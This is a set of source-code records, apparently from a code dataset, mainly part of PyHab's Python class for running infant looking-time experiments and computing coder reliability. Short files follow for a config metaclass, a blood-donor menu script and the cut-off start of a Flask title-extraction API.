trialVerbose.append(self.verbDatList['verboseOff2'][offIndex2])\n                            offIndex2 += 1\n                    trialVerbose2 = sorted(trialVerbose, key=lambda trialVerbose: trialVerbose['startTime'])\n                    verboseMatrix2.extend(trialVerbose2)\n                elif self.dataMatrix[q]['GNG'] == 0:  # bad trials. These arrays will be much less predictable, so putting them together is inherently more challenging\n                    if q > 0 and self.dataMatrix[q - 1]['GNG'] == 0:\n                        pass  # stops it from doubling up. If there is more than one consecutive bad trial, it will get all of them in a row the first time.\n                    else:\n                        for x in range(0, len(self.verbBadList['verboseOn2'])):\n                            if self.verbBadList['verboseOn2'][x]['trial'] == tnum and onIndex2 == -1:\n                                onIndex2 = x\n                        for y in range(0, len(self.verbBadList['verboseOff2'])):\n                            if self.verbBadList['verboseOff2'][y]['trial'] == tnum and offIndex2 == -1:\n                                offIndex2 = y\n                        trialVerbose = []\n                        if onIndex2 >= 0:\n                            while onIndex2 < len(self.verbBadList['verboseOn2']):\n                                if self.verbBadList['verboseOn2'][onIndex2]['trial'] == tnum:\n                                    trialVerbose.append(self.verbBadList['verboseOn2'][onIndex2])\n                                onIndex2 += 1\n                        if offIndex2 >= 0:\n                            while offIndex2 < len(self.verbBadList['verboseOff2']):\n                                if self.verbBadList['verboseOff2'][offIndex2]['trial'] == tnum:\n                                    trialVerbose.append(self.verbBadList['verboseOff2'][offIndex2])\n                                offIndex2 += 1\n                        trialVerbose2 = sorted(trialVerbose, key=lambda trialVerbose: trialVerbose['startTime'])\n                        verboseMatrix2.extend(trialVerbose2)\n            with open(self.verboseFolder + self.prefix + str(self.sNum) + '_' + str(self.sID) + nDupe + '_' + str(self.today.month) + str(self.today.day) + str(self.today.year) + '_VERBOSEb.csv', 'w') as f:\n                outputWriter3 = csv.DictWriter(f, fieldnames=headers2, extrasaction='ignore', lineterminator='\\n')\n                outputWriter3.writeheader()\n                for k in range(0, len(verboseMatrix2)):\n                    outputWriter3.writerow(verboseMatrix2[k])\n            rel = self.reliability(verboseMatrix, verboseMatrix2)\n            headers3 = ['WeightedPercentageAgreement', 'CohensKappa', 'AverageObserverAgreement', 'PearsonsR']\n            with open(self.dataFolder + self.prefix + str(self.sNum) + '_' + str(self.sID) + nDupe + '_' + str(self.today.month) + str(self.today.day) + str(self.today.year) + '_Stats.csv', 'w') as f:\n                outputWriter4 = csv.DictWriter(f, fieldnames=headers3, extrasaction='ignore', lineterminator='\\n')\n                outputWriter4.writeheader()\n                outputWriter4.writerow(rel)\n        # core.wait(.3) Replaced by end-of-experiment screen\n        # "end of experiment" screen. By default this will go to a black screen on the stim view\n        # and display "Experiment finished!" on the experimenter view\n        tempText.text = "Experiment finished! Press return to close."\n        tempText.height = 18\n        tempText.draw()\n        self.win2.flip()\n        if self.stimPres:\n            self.dummyThing.draw()\n            if self.endImageObject is not None:\n                self.endImageObject.draw()\n            self.win.flip()\n        event.waitKeys(keyList='return')\n\n        self.win2.close()\n        if self.stimPres:\n            self.win.close()\n\n    def saveBlockFile(self):\n        """\n        A function that creates a block-level summary file and saves it. Copies the primary data matrix (only good trials)\n        and loops over it, compressing all blocks. 
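For example (hypothetical names), a block 'blockA' spanning trials 2-4 would collapse to one line with trialType 'blockA', its looking-time fields summed, and stimName 'movie1+movie2+movie3'. 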
Does not work for habs, which follow their own rules.\n\n :return: A condensed copy of dataMatrix with all blocks of the relevant types condensed to one line.\n :rtype: list\n \"\"\"\n tempMatrix = deepcopy(self.dataMatrix)\n tempIndex = 0\n blockDone = False\n lastTrialNumber = tempMatrix[-1]['trial']\n # Making this generalizable for preferential looking studies.\n if 'sumOnL' in self.dataMatrix[0].keys():\n sumFields = ['sumOnL','numOnL','sumOnR', 'numOnR', 'sumOff', 'numOff']\n else:\n sumFields = ['sumOnA', 'numOnA', 'sumOffA', 'numOffA', 'sumOnB', 'numOnB', 'sumOffB', 'numOffB']\n while not blockDone:\n nt = tempMatrix[tempIndex]['trial']\n for i, j in self.blockDataTags.items():\n for k in range(0, len(j)):\n if nt in j[k]:\n tempType = tempMatrix[tempIndex]['trialType']\n if tempType[0:tempType.index('.')] == i:\n tempMatrix[tempIndex]['trialType'] = i # Rename the type line for the block as a whole.\n else: # If it's nested, maintain the prefixes.\n nestType = deepcopy(tempType)\n prefix = ''\n while nestType[0:nestType.index('.')] != i:\n prefix = prefix+nestType[0:nestType.index('.')]+'.'\n nestType = nestType[nestType.index('.')+1:]\n tempMatrix[tempIndex]['trialType'] = prefix+i # Rename the type line for the block as a whole.\n for l in range(1, len(j[k])): # Taking advantage of contiguity of blocks.\n if j[k][l] <= lastTrialNumber: # For studies that end early.\n # Fields to modify: sum and num on/off a/b, append stimnames.\n tempLine = tempMatrix.pop(tempIndex + 1) # Because we'll be sequentially popping them off, it'll always be the next one\n tempMatrix[tempIndex]['stimName'] = tempMatrix[tempIndex]['stimName'] + '+' + tempLine['stimName']\n for z in range(0, len(sumFields)):\n tempMatrix[tempIndex][sumFields[z]] = tempMatrix[tempIndex][sumFields[z]] + tempLine[sumFields[z]]\n tempIndex += 1\n if tempIndex >= len(tempMatrix):\n blockDone = True\n for i in range(0, len(tempMatrix)):\n tempMatrix[i]['trial'] = i+1\n return tempMatrix\n\n def saveHabFile(self):\n \"\"\"\n Creates a habituation summary data file, which has one line per hab trial, and only looks at parts of the hab\n trial that were included in calcHabOver. 
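(For example, if calcHabOver were ['C'], only the 'hab.C' portion of each habituation iteration would be folded into that iteration's single 'Hab' line.)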
This is notably easier in some ways because the hab trials are already\n tagged in dataMatrix\n\n :return: A condensed copy of dataMatrix with all hab trials condensed only to those that were used to compute habituation.\n :rtype: list\n \"\"\"\n habMatrix = []\n # Making this generalizable for preferential looking studies.\n if 'sumOnL' in self.dataMatrix[0].keys():\n sumFields = ['sumOnL', 'numOnL', 'sumOnR', 'numOnR', 'sumOff', 'numOff']\n else:\n sumFields = ['sumOnA', 'numOnA', 'sumOffA', 'numOffA', 'sumOnB', 'numOnB', 'sumOffB', 'numOffB']\n for i in range(0, len(self.dataMatrix)):\n if isinstance(self.dataMatrix[i]['habTrialNo'], int):\n tempType = deepcopy(self.dataMatrix[i]['trialType'])\n tempType = tempType[4:] # to remove 'hab.'\n if tempType in self.calcHabOver: # If not, this should specifically be ignored.\n tempNo = self.dataMatrix[i]['habTrialNo']\n addTo = False\n addIndex = -1\n tempLine = deepcopy(self.dataMatrix[i])\n tempLine['trialType'] = 'Hab'\n for j in range(0, len(habMatrix)):\n if habMatrix[j]['habTrialNo'] == tempNo:\n addTo = True\n addIndex = deepcopy(j)\n if addTo:\n habMatrix[addIndex]['stimName'] = habMatrix[addIndex]['stimName'] + '+' + tempLine['stimName']\n for z in range(0, len(sumFields)):\n habMatrix[addIndex][sumFields[z]] = habMatrix[addIndex][sumFields[z]] + tempLine[sumFields[z]]\n else:\n habMatrix.append(tempLine)\n else:\n pass\n else: # For all non-habituation trials.\n habMatrix.append(deepcopy(self.dataMatrix[i]))\n for i in range(0, len(habMatrix)):\n habMatrix[i]['trial'] = i+1\n return habMatrix\n\n def wPA(self, timewarp, timewarp2):\n \"\"\"\n Calculates weighted percentage agreement, computed as number of agreement frames over total frames.\n\n :param timewarp: List of every individual frame's gaze-on/gaze-off code for coder A\n :type timewarp: list\n :param timewarp2: As above for coder B\n :type timewarp2: list\n :return: Weighted Percentage Agreement\n :rtype: float\n \"\"\"\n a = 0\n d = 0\n for (i, j) in zip(timewarp, timewarp2):\n if i[0] == j[0]:\n if i[1] == j[1]:\n a += 1\n else:\n d += 1\n else:\n d += 1\n wpagreement = float(a) / float(a + d)\n return wpagreement\n\n def pearsonR(self, verboseMatrix, verboseMatrix2):\n \"\"\"\n Computes Pearson's R\n\n :param verboseMatrix: Verbose data, coder A\n :type verboseMatrix: list\n :param verboseMatrix2: Verbose data, coder B\n :type verboseMatrix2: list\n :return: Pearson's R\n :rtype: float\n \"\"\"\n trialA = []\n trialB = []\n avA = 0\n avB = 0\n # loop to construct trial array, zeroed out.\n for k in range(0, verboseMatrix[-1]['trial']):\n trialA.append(0)\n trialB.append(0)\n # separate loops for computing total on time per trial for each coder, must be done separately from verbose data files\n # b/c we no longer have access to the summary data\n for i in verboseMatrix:\n if i['GNG'] != 0: # Good trials only\n if i['gazeOnOff'] != 0: # We only care about total on-time.\n tn = i['trial'] - 1\n trialA[tn] += i['duration'] # add the looking time to the appropriate trial index.\n for i in verboseMatrix2:\n if i['GNG'] != 0: # Good trials only\n if i['gazeOnOff'] != 0: # We only care about total on-time.\n tn = i['trial'] - 1\n trialB[tn] += i['duration'] # add the looking time to the appropriate trial index.\n for j in range(0, len(trialA)):\n avA += trialA[j]\n avB += trialB[j]\n avA = avA / verboseMatrix[-1]['trial'] # final trial number.\n avB = avB / verboseMatrix2[-1]['trial'] # in point of fact should be the same last trial # but eh.\n xy = []\n for i in range(0, len(trialA)):\n 
trialA[i] -= avA\n trialB[i] -= avB\n xy.append(trialA[i] * trialB[i])\n for i in range(0, len(trialA)): # square the deviation arrays\n trialA[i] = trialA[i] ** 2\n trialB[i] = trialB[i] ** 2\n r = float(sum(xy) / sqrt(sum(trialA) * sum(trialB)))\n return r\n\n def cohensKappa(self, timewarp, timewarp2):\n \"\"\"\n Computes Cohen's Kappa\n\n :param timewarp: List of every individual frame's gaze-on/gaze-off code for coder A\n :type timewarp: list\n :param timewarp2: As above for coder B\n :type timewarp2: list\n :return: Kappa\n :rtype: float\n \"\"\"\n wpa = self.wPA(timewarp, timewarp2)\n coderBon = 0\n coderAon = 0\n for i in range(0, len(timewarp)): # are the 2 timewarps equal? - when can one be bigger?\n if timewarp[i][1] == 1:\n coderAon += 1\n if timewarp2[i][1] == 1:\n coderBon += 1\n pe = (float(coderAon) / len(timewarp)) * (float(coderBon) / len(timewarp2)) + (\n float(len(timewarp) - coderAon) / len(timewarp)) * (\n float(len(timewarp2) - coderBon) / len(timewarp2))\n k = float(wpa - pe) / float(1 - pe)\n return k\n\n def avgObsAgree(self, timewarp, timewarp2):\n \"\"\"\n Computes average observer agreement as agreement in each trial, divided by number of trials.\n\n :param timewarp: List of every individual frame's gaze-on/gaze-off code for coder A\n :type timewarp: list\n :param timewarp2: As above for coder B\n :type timewarp2: list\n :return: average observer agreement or N/A if no valid data\n :rtype: float\n \"\"\"\n\n finalTrial = timewarp[-1][0] # 0 is trial number.\n\n tg = 0\n if finalTrial > 0: # if there are NO good trials, well it's probably crashed already, but JIC\n for i in range(0, finalTrial): # need contingency if last trial is bad trial?\n a = 0\n d = 0\n for (m, l) in zip(timewarp, timewarp2):\n if m[0] == i + 1 and l[0] == i + 1:\n if m[1] == l[1]:\n a += 1\n else:\n d += 1\n tg = tg + float(a) / (a + d)\n aoagreement = float(tg) / finalTrial\n return aoagreement\n else:\n return 'N/A'\n\n def reliability(self, verboseMatrix, verboseMatrix2):\n \"\"\"\n Calculates reliability statistics. 
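Both coders' verbose records are first expanded into frame-by-frame [trial, gazeOnOff] arrays (at an assumed 60 fps, matching the duration * 60 rounding below) and padded to equal length before the frame-based statistics are computed.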
Constructed originally by Florin Gheorgiu for PyHab,\n modified by Jonathan Kominsky.\n\n\n :param verboseMatrix: A 2-dimensional list with the content of the verbose data file for coder 1\n :type verboseMatrix: list\n :param verboseMatrix2: A 2-dimensional list with the content of the verbose data file for coder 2\n :type verboseMatrix2: list\n :return: A dict of four stats in float form (weighted % agreement, average observer agreement, Cohen's Kappa, and Pearson's R)\n :rtype: dict\n \"\"\"\n\n timewarp = [] # frame by frame arrays\n timewarp2 = []\n\n for i in verboseMatrix:\n if i['GNG'] != 0: # check for it not to be a bad gaze\n for k in range(0, int(round(i['duration'] * 60))):\n timewarp.append([i['trial'], i['gazeOnOff']]) # 6 being On or Off and 7 the trial no.\n for i in verboseMatrix2:\n if i['GNG'] != 0:\n for k in range(0, int(round(i['duration'] * 60))):\n timewarp2.append([i['trial'], i['gazeOnOff']])\n if len(timewarp) > len(timewarp2): # making sure the frame by frame arrays are of equal length\n diff = len(timewarp) - len(timewarp2)\n for s in range(0, diff):\n timewarp2.append([verboseMatrix2[-1]['trial'], 0])\n elif len(timewarp) < len(timewarp2):\n diff = len(timewarp2) - len(timewarp)\n for s in range(0, diff):\n timewarp.append([verboseMatrix[-1]['trial'], 0])\n\n stats = {'WeightedPercentageAgreement': self.wPA(timewarp, timewarp2),\n 'CohensKappa': self.cohensKappa(timewarp, timewarp2),\n 'AverageObserverAgreement': self.avgObsAgree(timewarp, timewarp2),\n 'PearsonsR': self.pearsonR(verboseMatrix, verboseMatrix2)}\n return stats\n\n def isInt(t):\n \"\"\"\n silly little function for validating a very narrow usage of \"cond\" field\n\n :return: Bool: if arbitrary argument t is an int, true.\n :rtype:\n \"\"\"\n try:\n int(t)\n return True\n except ValueError:\n return False\n\n def run(self, testMode = []):\n \"\"\"\n Startup function. Presents subject information dialog to researcher, reads and follows settings and condition\n files. Now with a testing mode to allow us to skip the dialog and ensure the actualTrialOrder structure is being\n put together properly in unit testing.\n\n Also expands habituation blocks appropriately and tags trials with habituation iteration number as well as\n the symbol for the end of a hab block (^)\n\n :param testMode: Optional and primarily only used for unit testing. Will not launch the window and start the experiment. 
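(A purely hypothetical example: testMode = ['99', 'TEST01', 'F', '1', '15', '18', 'A'], mirroring the dialog fields read below: subject number, subject ID, sex, DOB month/day/year, and condition.)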
Contains all the info that would appear in the subject info dialog.\n :type testMode: list\n :return:\n :rtype:\n \"\"\"\n if len(testMode) > 0: # This is for testing purposes, to make sure we can automatically test most of the features of PyHab\n import mock\n startDlg = mock.MagicMock()\n startDlg.data = testMode\n startDlg.OK = True\n else:\n startDlg = gui.Dlg(title=self.prefix + ' Experiment')\n startDlg.addText('Subject info')\n startDlg.addField('Subject Number: ')\n startDlg.addField('Subject ID: ')\n startDlg.addField('sex: ')\n startDlg.addField('DOB(month): ')\n startDlg.addField('DOB(day): ')\n startDlg.addField('DOB(year): ')\n if self.randPres and len(self.condList) > 0:\n startDlg.addField('Cond: ', choices=self.condList)\n else:\n startDlg.addField('Cond: ')\n if not self.stimPres:\n startDlg.addText(\"Date of test (leave blank for today)\")\n startDlg.addField('DOT(month): ')\n startDlg.addField('DOT(day): ')\n startDlg.addField('DOT(year): ')\n startDlg.show()\n if startDlg.OK:\n fail = False # A bool for detecting if we have to start over at any point.\n thisInfo = startDlg.data\n self.sNum = thisInfo[0]\n self.sID = thisInfo[1]\n self.sex = thisInfo[2]\n # now for the exciting bit: converting DOB into months/days.\n self.today = date.today()\n # First, check valid entries\n try:\n for i in range(3,6):\n irrel = int(thisInfo[i])\n except:\n fail = True\n if not fail:\n # then, check if 4-digit or 2-digit year.\n if len(thisInfo[5]) > 2:\n year = int(thisInfo[5])\n else:\n year = 2000 + int(thisInfo[5])\n DOB = date(year, int(thisInfo[3]), int(thisInfo[4]))\n if self.stimPres:\n DOT = self.today\n elif len(thisInfo[9]) == 0 or len(thisInfo[8]) == 0 or len(thisInfo[7]) == 0:\n DOT = self.today\n else:\n try:\n if len(thisInfo[9]) > 2:\n year = int(thisInfo[9])\n else:\n year = 2000 + int(thisInfo[9])\n DOT = date(year, int(thisInfo[7]), int(thisInfo[8]))\n except:\n DOT = self.today\n warnDlg = gui.Dlg(\"Warning! Invalid date!\")\n warnDlg.addText(\"DOT is invalid. Defaulting to today's date.\")\n irrel = warnDlg.show()\n # Dateutil's relativedelta is included in psychopy and just better than every other option!\n ageDif = relativedelta(DOT, DOB)\n self.ageMo = ageDif.years * 12 + ageDif.months\n self.ageDay = ageDif.days # Impossibly simple, but it works.\n # build stimulus order\n if self.randPres and len(self.condList) > 0: # Extra check: We WANT conditions and we HAVE them too.\n self.condLabel = thisInfo[6]\n testReader = csv.reader(open(self.condPath + self.condFile, 'rU'))\n testStuff = []\n for row in testReader:\n testStuff.append(row)\n testDict = dict(testStuff)\n self.cond = testDict[self.condLabel] # this will read as order of movies in N groups, in a 2-dimensional array\n # type conversion required. 
Eval will read the string into a dictionary (now).\n self.cond = eval(self.cond)\n # now to rearrange the lists of each trial type.\n finalDict = {}\n finalBlock = {}\n for i, j in self.cond.items():\n newTempTrials = []\n for q in range(0, len(j)):\n if type(j[q]) is int: # Dealing with old versions.\n newTempTrials.append(self.stimNames[i][j[q] - 1])\n #print(\"Converting old conditions...\")\n\n else:\n newTempTrials.append(j[q])\n if i in self.blockList.keys():\n finalBlock[i] = newTempTrials\n finalDict[i] = newTempTrials\n self.stimNames = finalDict\n self.blockList = finalBlock\n if 'Hab' in self.blockList.keys():\n self.habTrialList = self.blockList['Hab']\n else:\n self.cond = thisInfo[6]\n self.condLabel = self.cond\n # Set actual order of trials\n self.actualTrialOrder = [] # in this version, mostly a key for the hab trials and blocks.\n for i in range(0, len(self.trialOrder)):\n if self.trialOrder[i] == 'Hab':\n for j in range(0, self.maxHabTrials):\n if len(self.habTrialList) > 0:\n self.blockExpander(self.habTrialList, 'hab', hab=True, habNum=j + 1)\n else:\n self.actualTrialOrder.append('Hab')\n self.maxHabIndex = len(self.actualTrialOrder) - 1 # Tracks the very last hab trial.\n elif self.trialOrder[i] in self.blockList.keys():\n if self.trialOrder[i] in self.blockDataList:\n start = len(self.actualTrialOrder)\n self.blockExpander(self.blockList[self.trialOrder[i]], self.trialOrder[i])\n if self.trialOrder[i] in self.blockDataList:\n end = len(self.actualTrialOrder)\n tempList = list(range(start+1,end+1))\n self.blockDataTags[self.trialOrder[i]].append(tempList)\n else:\n self.actualTrialOrder.append(self.trialOrder[i])\n if len(testMode) == 0: # If we're in test mode, skip setting up the window and launching the experiment.\n if len(self.actualTrialOrder) == 0:\n errWindow = gui.Dlg(\"Warning: No trials!\")\n errWindow.addText(\n \"There are no trials in the study flow! Please return to the builder and add trials to the study flow.\")\n errWindow.show()\n else:\n self.SetupWindow()\n else:\n self.run()\n\n def blockExpander(self, blockTrials, prefixes, hab=False, habNum=0, insert=-1):\n \"\"\"\n A method for constructing actualTrialOrder while dealing with recursive blocks. Can create incredibly long trial\n codes, but ensures that all information is accurately preserved. Works for both hab blocks and other things.\n For hab blocks, we can take advantage of the fact that hab cannot appear inside any other block. It will always\n be the top-level block, and so we can adjust the prefix once and it will carry through.\n\n :param blockTrials: The list of trials in self.blockList or self.habSubTrials\n :type blockTrials: list\n :param prefixes: A recursively growing stack of prefixes. If block A has B and block B has C, then an instance of A will be A.B.C in self.actualTrialOrder. This keeps track of the A.B. part.\n :type prefixes: str\n :param hab: Are we dealing with a habituation trial expansion?\n :type hab: bool\n :param habNum: If we are dealing with a habituation trial expansion, what number of it are we on?\n :type habNum: int\n :param insert: An int specifying where in actualTrialOrder to put a trial. 
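(With the default of -1 the expanded trials are appended to actualTrialOrder; a non-negative value splices them in at that index, which advances as each trial is inserted.)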
Needed to generalize this function for insertHab\n :type insert: int\n :return:\n :rtype:\n \"\"\"\n if hab:\n prefixes = prefixes + str(habNum)\n for q in range(0, len(blockTrials)):\n tempName = blockTrials[q]\n if tempName in self.blockList.keys():\n if tempName in self.blockDataList:\n start = len(self.actualTrialOrder)\n self.blockExpander(self.blockList[tempName], prefixes+'.'+tempName, hab=False, insert=insert)\n if tempName in self.blockDataList:\n end = len(self.actualTrialOrder)\n tempList = list(range(start + 1, end + 1))\n self.blockDataTags[tempName].append(tempList)\n if hab and q == len(self.habTrialList) - 1: # Go back and pin on the ^ if needed. A little cheaty\n revise = deepcopy(self.actualTrialOrder[-1])\n revise = revise[:revise.index('.')] + '^' + revise[revise.index('.'):]\n self.actualTrialOrder[-1] = revise\n else:\n if hab and q == len(self.habTrialList) - 1:\n prefixes = prefixes + '^' # End-of-hab-cycle marker\n tempName = prefixes + '.' + tempName\n if insert == -1:\n self.actualTrialOrder.append(tempName)\n else:\n self.actualTrialOrder.insert(insert, tempName)\n insert += 1\n\n def SetupWindow(self):\n \"\"\"\n Sets up the stimulus presentation and coder windows, loads all the stimuli, then starts the experiment\n with doExperiment()\n\n :return:\n :rtype:\n \"\"\"\n\n #VM ADDED\n pti.infant_tobii_controller.leapCalibrateBaby()\n\n # Important to do this first because it gets the windows in the correct order for focus etc.\n\n #VM CHANGED SELF.WIN FULLSCR TO TRUE\n if self.stimPres:\n # Stimulus presentation window\n self.win = visual.Window((self.screenWidth, self.screenHeight), fullscr=True, screen=self.screenIndex, allowGUI=False,\n units='pix', color=self.screenColor)\n self.dummyThing = visual.Circle(self.win, size=1, color=self.win.color) # This is for fixing a display glitch in PsychoPy3 involving multiple windows of different sizes.\n # Coder window\n self.win2 = visual.Window((400, 400), fullscr=False, screen=self.expScreenIndex, allowGUI=True, units='pix', waitBlanking=False,\n rgb=[-1, -1, -1])\n\n #VM ADDED\n self.controller = pti.infant_tobii_controller(self.win)\n self.controller.start_recording('data/toerase2.tsv', embed_event = True)\n\n if self.stimPres:\n tempText = visual.TextStim(self.win2, text=\"Loading Stimuli\", pos=[0, 0], color='white', bold=True, height=40)\n tempText.draw()\n self.win2.flip()\n # Step 1: Load and present \"startImage\"\n if self.startImage is not '':\n self.dummyThing.draw()\n tempStim = self.stimList[self.startImage]\n tempStimObj = visual.ImageStim(self.win, tempStim['stimLoc'], size=[self.movieWidth, self.movieHeight])\n tempStimObj.draw()\n self.win.flip() # This should now be on the screen until the first attngetter\n self.stimDict = {x: [] for x in self.stimNames.keys()} # This holds all the loaded movies.\n self.counters = {x: 0 for x in self.stimNames.keys()} # list of counters, one per index of the dict, so it knows which movie to play\n tempCtr = {x: 0 for x in self.stimNames.keys()}\n for i in self.actualTrialOrder:\n # Adjust for hab sub-trials. Looks for a very specific set of traits, which could occur, but...shouldn't.\n if '.' in i:\n tempI = i\n while '.' 
in tempI:\n tempI = tempI[tempI.index('.')+1:]\n i = tempI\n x = tempCtr[i] # Changed so hab trials get the same treatment as everything else.\n if x < len(self.stimNames[i]):\n tempStim = self.stimList[self.stimNames[i][x]]\n if tempStim['stimType'] == 'Movie':\n tempStimObj = visual.MovieStim3(self.win, tempStim['stimLoc'],\n size=[self.movieWidth, self.movieHeight], flipHoriz=False,\n flipVert=False, loop=False)\n elif tempStim['stimType'] == 'Image':\n tempStimObj = visual.ImageStim(self.win, tempStim['stimLoc'],\n size=[self.movieWidth, self.movieHeight])\n elif tempStim['stimType'] == 'Audio':\n tempStimObj = sound.Sound(tempStim['stimLoc'])\n else: # The eternal problem of audio/image pair. Just creates an object that's a dict of audio and image.\n audioObj = sound.Sound(tempStim['audioLoc'])\n imageObj = visual.ImageStim(self.win, tempStim['imageLoc'],\n size=[self.movieWidth, self.movieHeight])\n tempStimObj = {'Audio': audioObj, 'Image': imageObj}\n tempAdd = {'stimType':tempStim['stimType'], 'stim':tempStimObj}\n self.stimDict[i].append(tempAdd)\n tempCtr[i] += 1\n\n if len(list(self.playAttnGetter.keys())) > 0:\n for i in list(self.attnGetterList.keys()):\n if self.attnGetterList[i]['stimType'] == 'Audio':\n self.attnGetterList[i]['file'] = sound.Sound(self.attnGetterList[i]['stimLoc'])\n else:\n self.attnGetterList[i]['file'] = visual.MovieStim3(self.win, self.attnGetterList[i]['stimLoc'],\n size=[self.movieWidth, self.movieHeight],\n flipHoriz=False, flipVert=False, loop=False)\n if self.endImage is not '': # Load image for end of experiment, if needed.\n tempStim = self.stimList[self.endImage]\n self.endImageObject = visual.ImageStim(self.win, tempStim['stimLoc'], size=[self.movieWidth, self.movieHeight])\n else:\n self.endImageObject = None\n self.keyboard = self.key.KeyStateHandler()\n self.win2.winHandle.push_handlers(self.keyboard)\n if self.stimPres:\n self.win.winHandle.push_handlers(self.keyboard)\n self.baseSize = 40 # Base size of all attention-getters, in pixels\n self.attnGetterSquare = visual.Rect(self.win, height=self.baseSize, width=self.baseSize, pos=[self.testOffset + 0, 0], fillColor='black')\n self.attnGetterCross = visual.ShapeStim(self.win, vertices='cross', size=self.baseSize, pos=[self.testOffset + 0, 0], fillColor='black')\n\n numVertices = 10\n starRad = self.baseSize #This creates a large but static rotating star. 
It does not loom.\n starVerts = []\n for x in range(0,numVertices):\n if x % 2 == 1:\n tempRad = starRad*.55 # How much to draw in between the \"points\"\n else:\n tempRad = starRad\n tempVert = [tempRad*sin((2*pi)/numVertices * x), tempRad*cos((2*pi)/numVertices * x)]\n starVerts.append(tempVert)\n\n self.attnGetterStar = visual.ShapeStim(self.win, vertices=starVerts, pos=[self.testOffset + 0, 0], fillColor='black')\n\n self.statusSquareA = visual.Rect(self.win2, height=80, width=80,\n pos=[self.statusOffset - 60, self.statusOffsetY + 0],\n fillColor='black') # These two appear on the status screen window.\n self.statusSquareB = visual.Rect(self.win2, height=80, width=80,\n pos=[self.statusOffset + 60, self.statusOffsetY + 0], fillColor='black')\n self.statusTextA = visual.TextStim(self.win2, text=\"\", pos=[self.statusOffset - 60, self.statusOffsetY + 0],\n color='white', bold=True, height=30)\n self.statusTextB = visual.TextStim(self.win2, text=\"\", pos=[self.statusOffset + 60, self.statusOffsetY + 0],\n color='white', bold=True, height=30)\n self.trialText = visual.TextStim(self.win2, text=\"Trial no: \", pos=[-100, 150], color='white')\n self.readyText = visual.TextStim(self.win2, text=\"Trial not active\", pos=[-25, 100], color='white')\n \n #VM ADDED\n print('experiment starting...')\n \n self.doExperiment() # Get this show on the road!\n","sub_path":"Stimuli presentation/PyHab/PyHabClass.py","file_name":"PyHabClass.py","file_ext":"py","file_size_in_byte":124492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"158742750","text":"#!/usr/bin/env python\n#\n# Copyright 2014 Simone Campagna\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom .configobj_wrap import ConfigObjWrap\n\n\n__author__ = \"Simone Campagna\"\n__all__ = [\n 'MetaConfigment',\n]\n\n\nclass MetaConfigment(ConfigObjWrap.__class__):\n def __new__(mcs, class_name, class_bases, class_dict):\n cls = super(MetaConfigment, mcs).__new__(mcs, class_name, class_bases, class_dict)\n configspec_source = getattr(cls, 'CONFIGSPEC_SOURCE', '')\n configspec = ConfigObjWrap(\n infile=configspec_source.split('\\n'),\n interpolation=False,\n list_values=False,\n )\n mcs._extend_section(configspec)\n setattr(cls, \"CONFIGSPEC\", configspec)\n return cls\n\n @classmethod\n def _extend_section(mcs, section):\n if not hasattr(section, '__validate__'):\n section['__validate__'] = 'boolean(default=True)'\n if not hasattr(section, '__base_dir__'):\n section['__base_dir__'] = 'string(default=\"\")'\n for section_name in section.sections:\n mcs._extend_section(section[section_name])\n","sub_path":"src/configment/meta_configment.py","file_name":"meta_configment.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"226538315","text":"# -- coding: utf-8 --\nfrom donor import Person\nfrom event import Event\nfrom msvcrt import getch\nimport os\nimport time\n\nclass MainOld:\n 
@staticmethod\n def select_menu():\n while True:\n os.system('cls')\n print(\"<~~~~~~~~----------------------^^^^^^^----------------------~~~~~~~>\")\n print(\"Welcome to the blood donor and event location register application!\")\n print(\"Please select what you would like to register:\\n1 - Donor registration\\n2 - Donor event location registration\"\n \"\\n3 - Exit\")\n menu = input(\">> \")\n if menu == \"1\":\n Person.donor_register_app()\n print(\"\\n\")\n break\n elif menu == \"2\":\n Event.event_data()\n print(\"\\n\")\n break\n elif menu == \"3\":\n exit()\n else:\n print(\"Please select a valid menu number!\")\n time.sleep(1.4)\n\nMainOld.select_menu()","sub_path":"main_old.py","file_name":"main_old.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
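# A hedged aside on the menu loop above: the if/elif chain could also be written
# as a dict dispatch table. A minimal sketch, reusing names from that record
# (illustrative only, not part of the original file):
#
#     actions = {"1": Person.donor_register_app, "2": Event.event_data, "3": exit}
#     action = actions.get(input(">> "))
#     if action is None:
#         print("Please select a valid menu number!")
#     else:
#         action()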
{"seq_id":"387668455","text":"#!/usr/bin/env python3\n\n\"\"\"\nTitle generation.\n\"\"\"\n# Time: 2018-01-31T06:11:05.638Z\n# Author: Zili Wang\n# E-mail: zili_wang@163.com\n\nfrom flask_restful import Resource\nfrom flask import request\nfrom incident import PACKAGE_ROOT\nimport sys\nfrom incident.model.boltitleextraction import BolTitleExtraction\nfrom wtforms import Form, StringField, validators, IntegerField\nfrom flask import current_app as app\nimport json\n\n\nclass TittleExtractor(Resource):\n \"\"\"\n @api {post} tittle Request recommend incident tittle\n @apiVersion 0.1.0\n @apiGroup INCIDENT\n @apiName Recommend incident Tittle\n @apiParam {string} desc description of incident\n @apiSuccessExample {json} Success-Response:\n \"a sample of a tittle.\"\n \"\"\"\n \"\"\"\n @api {post} /tittle Request recommend incident tittle\n @apiVersion 0.1.1\n @apiGroup INCIDENT\n @apiName Recommend incident Tittle\n @apiParam {string} model project model: 'ecu' for Ecuador, 'bol' for Bolivia\n @apiParam {int} id second-level incident type ID\n @apiParam {string} desc incident description\n @apiSuccessExample {json} Success-Response:\n {\n \"tittle\": \"a la altura del colegio teniente hugo ortiz -diagonagl al parque de los samanes alertante indica camioneta esta en la via rapida, informante sr. lalama 0999163219\",\n \"keywords\": [\n \"via\",\n \"av\",\n \"camioneta\",\n \"altura\",\n \"ref\"\n ]\n }\n \"\"\"\n \"\"\"\n @api {post} /tittle Request recommend incident tittle\n @apiVersion 1.0.0\n @apiGroup INCIDENT\n @apiName Recommend incident Tittle\n @apiParam {int} id second-level incident type ID\n @apiParam {string} desc incident description\n 